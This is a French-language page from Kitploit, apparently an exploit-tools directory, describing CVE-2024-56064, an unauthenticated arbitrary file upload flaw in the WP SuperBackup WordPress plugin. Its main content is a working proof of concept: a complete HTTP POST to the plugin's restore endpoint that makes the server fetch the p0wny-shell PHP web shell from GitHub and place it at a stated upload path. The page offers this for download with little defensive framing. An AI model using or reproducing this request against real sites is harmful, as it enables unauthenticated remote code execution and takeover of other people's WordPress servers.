Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-56064 — WP SuperBackup <= 2.3.3 - Téléversement de fichier arbitraire non authentifié | Kitploit
Outils/GitHubGitHub/randomrobbiebf/cve-2024-56064
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubrandomrobbiebf/cve-2024-56064

CVE-2024-56064

WP SuperBackup <= 2.3.3 - Téléversement de fichier arbitraire non authentifié

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-56064

WP SuperBackup <= 2.3.3 - Téléversement arbitraire de fichiers non authentifié

Description

Le plugin WordPress Super Backup & Clone - Migrate for WordPress est vulnérable au téléversement arbitraire de fichiers en raison de l'absence de validation du type de fichier dans toutes les versions jusqu'à la version 2.3.3 incluse. Cela permet à des attaquants non authentifiés de téléverser des fichiers arbitraires sur le serveur du site affecté, ce qui peut rendre possible l'exécution de code à distance.

Détails

  • Type : plugin
  • Slug : indeed-wp-superbackup
  • Version affectée : 2.3.3
  • Score CVSS : 9.8
  • Sévérité CVSS : Critique
  • Vecteur CVSS : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE : CVE-2024-56064
  • Statut : Privé

POC

Le shell met un certain temps à apparaître... il apparaîtra dans /wp-content/uploads/isnapshots/shell.php

root@kitploit:~
POST /wp-admin/admin.php?page=ibk_admin&tab=restore HTTP/1.1
Host: kubernetes.docker.internal:8929
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal:8929/wp-admin/admin.php?page=ibk_admin&tab=restore
Content-Type: multipart/form-data; boundary=---------------------------24461452295617717774000608677
Content-Length: 688
Origin: http://kubernetes.docker.internal:8929
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i

-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="ibk_restore_migrate_action"

1
-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="restore_type"

restore_url
-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="restore_url"

https://raw.githubusercontent.com/flozz/p0wny-shell/refs/heads/master/shell.php

-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="upload_file"; filename=""
Content-Type: application/octet-stream


-----------------------------24461452295617717774000608677--

Télécharger l’outil